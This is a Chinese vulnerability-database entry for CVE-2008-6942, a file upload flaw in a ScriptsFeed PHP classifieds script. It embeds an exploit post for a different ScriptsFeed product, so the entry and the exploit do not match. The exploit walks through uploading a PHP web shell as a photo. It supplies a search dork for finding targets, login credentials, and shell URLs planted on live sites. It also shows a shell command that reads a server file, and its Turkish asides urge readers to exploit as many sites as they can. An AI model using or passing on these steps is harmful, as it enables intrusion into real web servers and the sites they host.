ScriptsFeed Realtor Classifieds System 任意文件上传漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116738 漏洞类型 输入验证
发布时间 2008-11-13 更新时间 2009-08-12
CVE编号 CVE-2008-6942 CNNVD-ID CNNVD-200908-108
漏洞平台 PHP CVSS评分 6.5
|漏洞来源
https://www.exploit-db.com/exploits/7112
https://cxsecurity.com/issue/WLB-2009080107
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200908-108
|漏洞详情
ScriptsFeedRealtorClassifiedsSystem(又称作RealEstateClassifieds)的任意文件上传漏洞。远程认证用户通过会上传一个具有例如logo那样的可执行扩展名的一个文件并向classifieds1/yellow_images/的文件提交一个直接请求来访问该文件,以执行任意代码。
|漏洞EXP
[~] ScriptsFeed (SF) Recipes Listing Portal Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 13.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] my bug number now: 39
[~]
[~] my target bug number: 100
[~]
[~] dork: allinurl:"recipedetail.php?id="  ( çok site var sömürün : ) )
[~]
[~] -----------------------------------------------------------


Exploit:

http://localhost/script/pictures/[id]your_shell.php

you register to site 

register: http://localhost/script/register.php

after you login to site

login: http://localhost/script/login.php

more after you click to "Add a Recipe" and add recipe

and after click to "View your Recipes" click to you recipe open new page 

right click to your photo. select properties copy photo lick

and paste your explorer go your shell

your_shell.php path:

http://localhost/script/pictures/[id]your_shell.php



rfu for demo:

user: zorlu

passwd: zorlu1

shell path:

http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php



example 2: 

user: zorlu

passwd: zorlu1

shell:

http://onlineyemektarifi.com/pictures/1226598952c.php? ( hemen indexlemeyin kurcalayIn serverI )

misal:

http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server daki siteler )


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-13]
|参考资料

来源:XF
名称:realtorclassifiedssystem-image-file-upload(46609)
链接:http://xforce.iss.net/xforce/xfdb/46609
来源:BID
名称:32293
链接:http://www.securityfocus.com/bid/32293
来源:MILW0RM
名称:7110
链接:http://www.milw0rm.com/exploits/7110
来源:SECUNIA
名称:32690
链接:http://secunia.com/advisories/32690
来源:OSVDB
名称:49960
链接:http://osvdb.org/49960